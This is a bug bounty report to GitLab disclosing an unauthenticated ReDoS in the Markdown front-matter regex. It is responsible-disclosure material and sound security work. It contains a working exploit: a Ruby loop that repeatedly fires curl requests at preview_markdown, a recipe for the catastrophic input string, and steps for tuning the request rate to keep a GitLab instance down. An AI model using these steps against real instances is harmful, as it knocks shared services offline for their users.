ReDoS via FrontMatterFilter in any Markdown fields
HackerOne report #1943819 by ryhmnlfj
on 2023-04-12, assigned to @greg:
Report
Summary
I found a server-side ReDoS via FrontMatterFilter in any Markdown field.
An attacker can take down a GitLab instance by sending unauthenticated requests containing a crafted payload to the preview_markdown endpoint.
Preparation before reproducing the bug
Please install the command line tools ruby and curl on your computer.
Also, please download FrontMatterFilter_ReDoS_payload.json attached to this report.
These will be used in step 11 of the "Steps to reproduce" section.
And most importantly, please prepare a GitLab instance that you can use personally.
DO NOT try to reproduce this bug against gitlab.com or other public instances.
Steps to reproduce
- Set up and launch your GitLab instance, and create a new account on it.
- Sign in to the account you created in step 1.
- Create a new public group and make a note of the public group name at this time.
- Sign out as you will be accessing as an unauthenticated user in the following steps.
- After launching your browser's developer tools, browse to the public group you created in step 3 as an unauthenticated user.
- Check the HTML rendered in step 5 and take a note of the content of csrf-token at this time.
- Check the request sent to your GitLab instance in step 5 and take a note of the value of _gitlab_session at this time.
- Close your browser and open a command console.
- Let's construct the command to demonstrate the ReDoS. Replace each string in the command template according to the replacement table.
- Command template:
ruby -e 'while true do p spawn("curl --header Content-Type:application/json --header X-CSRF-Token:[CSRF_TOKEN_VALUE] --header Cookie:_gitlab_session=[SESSION_VALUE] --data @FrontMatterFilter_ReDoS_payload.json http://[YOUR_GITLAB_INSTANCE_DOMAIN]/groups/[PUBLIC_GROUP_NAME]/preview_markdown"); sleep 1; end'
- Replacement table:
String in the command template | Replace with |
---|---|
[CSRF_TOKEN_VALUE] | the content of csrf-token noted in step 6 |
[SESSION_VALUE] | the value of _gitlab_session noted in step 7 |
[YOUR_GITLAB_INSTANCE_DOMAIN] | the domain string of your instance |
[PUBLIC_GROUP_NAME] | the public group name noted in step 3 |
For reference, here's an example in my local environment:
ruby -e 'while true do p spawn("curl --header Content-Type:application/json --header X-CSRF-Token:E_NhtPEqA7IpGGSH0jgsfRtruz5fAeeqRxQgBn-kl2mCkdxxBHP4HC9YdK6_mDdZqxCkhzkjSzESZOvAGwJQPQ --header Cookie:_gitlab_session=26c454aeadefc013a10a0fdddabcfd12 --data @FrontMatterFilter_ReDoS_payload.json http://my-gitlab-h1.test/groups/public_group_for_test/preview_markdown"); sleep 1; end'
- Change the current directory of the command console to the directory where FrontMatterFilter_ReDoS_payload.json is saved.
- Run the command constructed in step 9 in the command console, and confirm the significant consumption of CPU resources.
For reference, when I ran the above command, the CPU resources of my instance with 16 CPU cores and 32GB of memory were quickly exhausted.
NOTE: If you can confirm a surge in CPU usage at step 11, that's enough confirmation that this bug is a valid ReDoS vulnerability, based on past valid reports.
NOTE 2: This crafted command will keep sending requests until you force it to stop. Please be sure to terminate the command after confirming the vulnerability.
Details about the command constructed in step 9:
The executed command sends 1 request per second, and each request that triggers the ReDoS exhausts the resources of 1 CPU core.
The GitLab instance has the default timeout of 60 seconds per request. However, because the load per request is too high, there are many worker processes that do not finish processing even after the timeout has passed.
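The load described above can be estimated with simple arithmetic. The following is a rough sketch, assuming each malicious request keeps one CPU core busy for at least the full 60-second timeout; the helper name requests_in_flight is hypothetical, and the real ceiling also depends on how many worker processes the instance runs.

```ruby
# Little's law: average requests in flight = arrival rate x time each request stays busy.
def requests_in_flight(requests_per_second, busy_seconds_per_request)
  requests_per_second * busy_seconds_per_request
end

cpu_cores = 16                        # the test instance described in this report
in_flight = requests_in_flight(1, 60) # 1 RPS, each request busy for 60 seconds or more

puts "#{in_flight} CPU-bound requests in flight vs #{cpu_cores} cores"
```

Under these assumptions, even 1 request per second asks for several times more CPU-bound work than a 16-core machine can run in parallel.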
Additional information to confirm this vulnerability meets the A:H and S:C criteria
IMPORTANT NOTE: This section contains additional information to confirm that this vulnerability meets the criteria for A:H and S:C. Please use this information after triage, as this section contains time-consuming steps and may be an over-verification of whether this report is valid.
If the GitLab instance is attacked at a well-tuned RPS(requests per second) rate for a reasonable amount of time, then as long as the attack continues, the instance will take 60+ seconds to process every single request.
This indicates that timeouts are not working well under heavy load.
As a result, a 500 error will be returned for each and every request.
I describe below how to attack at a well-tuned RPS rate for a reasonable amount of time by using the command constructed in step 9 of "Steps to reproduce" section of this report.
- Before running the constructed command, maintain a separate session as an authenticated user by signing in to the instance with a different browser than the one that obtained the unauthenticated user's CSRF token and session.
- Iterate on executing the constructed command and adjusting the RPS rate.
  The constructed command will display the PIDs of the spawned curl processes and the responses from the instance in the console.
  Please adjust the RPS rate as described below so that 1 or 2 PIDs and several 500 error responses are alternately displayed.
  - We can adjust the RPS rate by changing the sleep value at the end of the command. For example, changing to sleep 1; will result in RPS = 1, sleep 0.5; will result in RPS = 2, and sleep 2; will result in RPS = 0.5.
  - We need to adjust the RPS rate so that it does not exceed the "Test RPS rates" (described in "Clarifying notes"). As an example, for the 1k Reference Architecture, "Test RPS rates" is 2 RPS.
  NOTE: Since the default timeout is 60 seconds, we need to wait a few minutes after executing the command to see the PIDs and error responses alternately displayed. There is no problem if PIDs are occasionally displayed continuously, but if it is clearly not working, please stop the command and adjust the RPS rate.
- With the tuned command still running, visit any page on the instance with the authenticated user's session maintained in step 1 of this section, and check if the 500 error is returned after a response delay of 60+ seconds.
  After you start getting 500 errors for authenticated requests, wait tens of minutes and you'll start getting 500 errors for unauthenticated requests and requests to the API.
  NOTE: This behavior seems to occur because handling authenticated requests tends to be more complex than handling unauthenticated requests.
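The relationship between the sleep value and the RPS rate used in the steps above can be written down as a small sketch. The helper rps_for and the constant TEST_RPS_LIMIT are hypothetical names; the limit of 2 is the "Test RPS rates" figure quoted in this report for the 1k Reference Architecture.

```ruby
# RPS is the reciprocal of the sleep interval between spawned requests.
def rps_for(sleep_seconds)
  1.0 / sleep_seconds
end

TEST_RPS_LIMIT = 2.0 # figure quoted in this report for the 1k Reference Architecture

[1, 0.5, 2].each do |sleep_seconds|
  rps = rps_for(sleep_seconds)
  status = rps <= TEST_RPS_LIMIT ? 'within limit' : 'exceeds limit'
  puts "sleep #{sleep_seconds}; => RPS = #{rps} (#{status})"
end
```

This ignores the small amount of time spent spawning each process, so the real rate would be slightly lower than the computed value.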
When I tested it on my instance, it took about 10-20 minutes at a rate of 1 RPS for my instance (16 CPU cores and 32GB of memory) to reach the above DoS state.
Also, when I looked at the runner logs in this state, I could see that the runner was failing to pick up the jobs.
$ sudo docker logs my_runner_container
[...snip...]
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
Since I was using the gitlab/gitlab-runner:alpine image for testing, I ran the docker logs command to see the runner logs.
Additionally, in a pipeline that started while the instance was in the above DoS state, the jobs failed with a timeout because the runner was unable to communicate with the instance, and the subsequent job in the pipeline was not run.
This means that the instance has been completely taken down, so this vulnerability fully meets the A:H criteria.
It also meets the S:C criteria because the instance returns a 500 error for any HTTP request from other components, which significantly affects the behavior of those components.
What is the current bug behavior?
The vulnerable regular expression exists in the following part of the source code.
https://gitlab.com/gitlab-org/gitlab/-/blob/v15.10.2-ee/lib/gitlab/front_matter.rb#L3-20
module Gitlab
  module FrontMatter
    DELIM_LANG = {
      '---' => 'yaml',
      '+++' => 'toml',
      ';;;' => 'json'
    }.freeze

    DELIM = Regexp.union(DELIM_LANG.keys)

    PATTERN = %r{
      \A(?<encoding>[^\r\n]*coding:[^\r\n]*\R)? # optional encoding line
      (?<before>\s*)
      ^(?<delim>#{DELIM})[ \t]*(?<lang>\S*)\R # opening front matter marker (optional language specifier)
      (?<front_matter>.*?) # front matter block content (not greedy)
      ^(\k<delim> | \.{3}) # closing front matter marker
      [^\S\r\n]*(\R|\z)
    }mx.freeze
  end
end
Performing regular expression matching with Gitlab::FrontMatter::PATTERN on the specially crafted string causes severe backtracking.
This crafted string can be easily generated with the Ruby code "coding:" * 120_000 + "\n" * 80_000 + ";".
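To observe the growth in matching time safely, the same string shape can be tried at a much smaller scale on a local machine. This is only a sketch: the pattern is copied from the excerpt above, crafted_string is a hypothetical helper, and the sizes are deliberately tiny so the script finishes quickly. Actual timings depend on the Ruby version and hardware, so none are claimed here.

```ruby
require 'benchmark'

# Copied from the excerpt above (lib/gitlab/front_matter.rb at v15.10.2-ee).
DELIM_LANG = { '---' => 'yaml', '+++' => 'toml', ';;;' => 'json' }.freeze
DELIM = Regexp.union(DELIM_LANG.keys)
PATTERN = %r{
  \A(?<encoding>[^\r\n]*coding:[^\r\n]*\R)? # optional encoding line
  (?<before>\s*)
  ^(?<delim>#{DELIM})[ \t]*(?<lang>\S*)\R # opening front matter marker (optional language specifier)
  (?<front_matter>.*?) # front matter block content (not greedy)
  ^(\k<delim> | \.{3}) # closing front matter marker
  [^\S\r\n]*(\R|\z)
}mx.freeze

# Hypothetical helper: same shape as the string in this report, at a chosen scale.
def crafted_string(codings, newlines)
  'coding:' * codings + "\n" * newlines + ';'
end

# Double the input size each round and print how long one match attempt takes.
[250, 500, 1_000].each do |n|
  input = crafted_string(n, n)
  seconds = Benchmark.realtime { PATTERN.match?(input) }
  puts format('codings=%5d newlines=%5d  %.4fs', n, n, seconds)
end
```

If the time grows noticeably faster than the input size from one round to the next, that is consistent with the backtracking behavior described in this report.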
The matching with Gitlab::FrontMatter::PATTERN against the actual input string is performed in the FrontMatterFilter::call method below.
module Banzai
  module Filter
    class FrontMatterFilter < HTML::Pipeline::Filter
      def call
        lang_mapping = Gitlab::FrontMatter::DELIM_LANG
        html.sub(Gitlab::FrontMatter::PATTERN) do |_match|
What is the expected correct behavior?
We should either rewrite Gitlab::FrontMatter::PATTERN so that it doesn't cause severe backtracking, or write code that does the equivalent without using regular expressions.
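As an illustration of the second option, front matter could be located with a single pass over the lines. The following is only a sketch and not GitLab's actual fix: split_front_matter and its return shape are hypothetical, and it approximates PATTERN rather than reproducing every edge case (for example, it only treats "\n" as a line terminator).

```ruby
DELIM_LANG = { '---' => 'yaml', '+++' => 'toml', ';;;' => 'json' }.freeze

# Hypothetical helper: returns nil when no front matter block is found.
def split_front_matter(text)
  lines = text.lines # each element keeps its trailing "\n"
  idx = 0

  # Optional encoding line (approximates the "coding:" check in PATTERN).
  idx += 1 if lines[idx]&.include?('coding:')

  # Skip blank lines before the opening marker.
  idx += 1 while idx < lines.size && lines[idx].strip.empty?

  opener = lines[idx]
  return nil unless opener

  delim = DELIM_LANG.keys.find { |d| opener.start_with?(d) }
  return nil unless delim

  # Whatever follows the marker must be a single token (the language) or nothing.
  lang = opener[delim.size..].strip
  return nil if lang.split.size > 1

  # The closing marker is the same delimiter, or "...", alone on a line.
  body_start = idx + 1
  closing = (body_start...lines.size).find { |i| [delim, '...'].include?(lines[i].rstrip) }
  return nil unless closing

  {
    lang: lang.empty? ? DELIM_LANG[delim] : lang,
    front_matter: lines[body_start...closing].join,
    rest: lines[(closing + 1)..].join
  }
end

p split_front_matter("---\ntitle: x\n---\nbody\n")
```

Because each line is inspected a bounded number of times, the work grows in proportion to the input length, and there is no backtracking to exploit.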
Relevant logs and/or screenshots
I put references to the screenshots at the appropriate places in this report.
I also attach the stack trace when one request was forcefully stopped after 60+ seconds.
Rack::Timeout::RequestTimeoutException (Request ran for longer than 60000ms ):
lib/banzai/filter/front_matter_filter.rb:9:in `sub'
lib/banzai/filter/front_matter_filter.rb:9:in `call'
lib/banzai/pipeline/base_pipeline.rb:23:in `block (2 levels) in singleton class'
lib/banzai/renderer.rb:128:in `render_result'
lib/banzai/renderer.rb:166:in `cacheless_render'
lib/banzai/renderer.rb:30:in `render'
lib/banzai/renderer.rb:120:in `block in cache_collection_render'
lib/banzai/renderer.rb:119:in `each'
lib/banzai/renderer.rb:119:in `cache_collection_render'
lib/banzai/reference_extractor.rb:33:in `html_documents'
lib/banzai/reference_extractor.rb:18:in `references'
lib/gitlab/reference_extractor.rb:24:in `references'
lib/gitlab/reference_extractor.rb:43:in `block (2 levels) in <class:ReferenceExtractor>'
app/services/preview_markdown_service.rb:33:in `find_user_references'
app/services/preview_markdown_service.rb:6:in `execute'
app/controllers/concerns/preview_markdown.rb:8:in `preview_markdown'
ee/lib/gitlab/ip_address_state.rb:10:in `with'
ee/app/controllers/ee/application_controller.rb:46:in `set_current_ip_address'
app/controllers/application_controller.rb:524:in `set_current_admin'
lib/gitlab/session.rb:11:in `with_session'
app/controllers/application_controller.rb:515:in `set_session_storage'
lib/gitlab/i18n.rb:107:in `with_locale'
app/controllers/application_controller.rb:508:in `set_locale'
app/controllers/application_controller.rb:499:in `set_current_context'
lib/gitlab/metrics/elasticsearch_rack_middleware.rb:16:in `call'
lib/gitlab/middleware/memory_report.rb:13:in `call'
lib/gitlab/middleware/speedscope.rb:13:in `call'
lib/gitlab/database/load_balancing/rack_middleware.rb:23:in `call'
lib/gitlab/middleware/rails_queue_duration.rb:33:in `call'
lib/gitlab/metrics/rack_middleware.rb:16:in `block in call'
lib/gitlab/metrics/web_transaction.rb:46:in `run'
lib/gitlab/metrics/rack_middleware.rb:16:in `call'
lib/gitlab/jira/middleware.rb:19:in `call'
lib/gitlab/middleware/go.rb:20:in `call'
lib/gitlab/etag_caching/middleware.rb:21:in `call'
lib/gitlab/middleware/query_analyzer.rb:11:in `block in call'
lib/gitlab/database/query_analyzer.rb:37:in `within'
lib/gitlab/middleware/query_analyzer.rb:11:in `call'
lib/gitlab/middleware/multipart.rb:173:in `call'
lib/gitlab/middleware/read_only/controller.rb:50:in `call'
lib/gitlab/middleware/read_only.rb:18:in `call'
lib/gitlab/middleware/same_site_cookies.rb:27:in `call'
lib/gitlab/middleware/basic_health_check.rb:25:in `call'
lib/gitlab/middleware/handle_malformed_strings.rb:21:in `call'
lib/gitlab/middleware/handle_ip_spoof_attack_error.rb:25:in `call'
lib/gitlab/middleware/request_context.rb:21:in `call'
lib/gitlab/middleware/webhook_recursion_detection.rb:15:in `call'
config/initializers/fix_local_cache_middleware.rb:11:in `call'
lib/gitlab/middleware/compressed_json.rb:37:in `call'
lib/gitlab/middleware/rack_multipart_tempfile_factory.rb:19:in `call'
lib/gitlab/middleware/sidekiq_web_static.rb:20:in `call'
lib/gitlab/metrics/requests_rack_middleware.rb:79:in `call'
lib/gitlab/middleware/release_env.rb:13:in `call'
Output of checks
This bug happens on the official Docker installation of GitLab Enterprise Edition 15.10.2-ee.
I used Chromium 112 and Firefox 112 on Debian 11 to verify this bug.
Results of GitLab environment info
Output of sudo gitlab-rake gitlab:env:info:
System information
System:
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 3.0.5p211
Gem Version: 3.2.33
Bundler Version:2.3.15
Rake Version: 13.0.6
Redis Version: 6.2.11
Sidekiq Version:6.5.7
Go Version: unknown
GitLab information
Version: 15.10.2-ee
Revision: a54d6973eae
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 13.8
URL: http://my-gitlab-h1.test
HTTP Clone URL: http://my-gitlab-h1.test/some-group/some-project.git
SSH Clone URL: git@my-gitlab-h1.test:some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 14.18.0
Repository storages:
- default: unix:/var/opt/gitlab/gitaly/gitaly.socket
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Impact
By exploiting this ReDoS vulnerability, an unauthenticated attacker could significantly reduce the availability of the entire GitLab instance.
Based on the policy of GitLab's Bug Bounty Program, past reports, and my research on the impact of this bug, I would suggest the following CVSS score:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
8.6 (High)
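For readers who want to check the arithmetic, the score can be recomputed from the CVSS v3.1 base score equations. This is a sketch: the metric weights are the standard v3.1 values for this vector, and the method names are hypothetical.

```ruby
# CVSS v3.1 "Roundup": smallest number with one decimal place that is >= value.
def roundup(value)
  scaled = (value * 100_000).round
  return scaled / 100_000.0 if (scaled % 10_000).zero?

  (scaled / 10_000 + 1) / 10.0
end

# Base score for a vector with Scope: Changed (S:C).
def base_score_scope_changed(av:, ac:, pr:, ui:, c:, i:, a:)
  iss = 1 - (1 - c) * (1 - i) * (1 - a)
  impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02)**15
  exploitability = 8.22 * av * ac * pr * ui
  return 0.0 if impact <= 0

  roundup([1.08 * (impact + exploitability), 10].min)
end

# AV:N = 0.85, AC:L = 0.77, PR:N = 0.85, UI:N = 0.85, C:N = 0, I:N = 0, A:H = 0.56
score = base_score_scope_changed(av: 0.85, ac: 0.77, pr: 0.85, ui: 0.85, c: 0.0, i: 0.0, a: 0.56)
puts score # 8.6
```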
I would also like to add some detailed explanations of the notable points in the above score.
- PR:N: As described in the "Steps to reproduce" section, this attack can be performed by an unauthenticated attacker.
- S:C: Since this ReDoS attack causes all endpoints of the GitLab instance to become unresponsive, it also affects the behavior of other components that rely on HTTP communication with the instance. For example, user-configured integrations, uploading artifacts from runners, GitLab Pages that rely on downloading artifacts, etc. are affected by the unresponsive state of the GitLab instance.
- A:H: This ReDoS attack causes enough load to meet the A:H criteria for the 1k Reference Architecture as stated on the GitLab CVSS Calculator page.
More specifically, this attack clearly satisfies the "Clarifying notes" condition on the GitLab CVSS Calculator page.
When evaluating Availability impacts for DoS that require sustained traffic, use the 1k Reference Architecture. The number of requests must be fewer than the "test request per seconds rates" and cause 10+ seconds of user-perceivable unavailability to rate the impact as A:H.
In addition to the above, it is important to note that any feature with Markdown fields is vulnerable to this ReDoS attack.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
- FrontMatterFilter_ReDoS_payload.json
- create_public_group.png
- csrf_token.png
- session_value.png
- htop_all_cores_exhausted.png
- 500_error.png
- failed_pipeline.png
- failed_jobs_timeout.png
How To Reproduce
Please add reproducibility information to this section: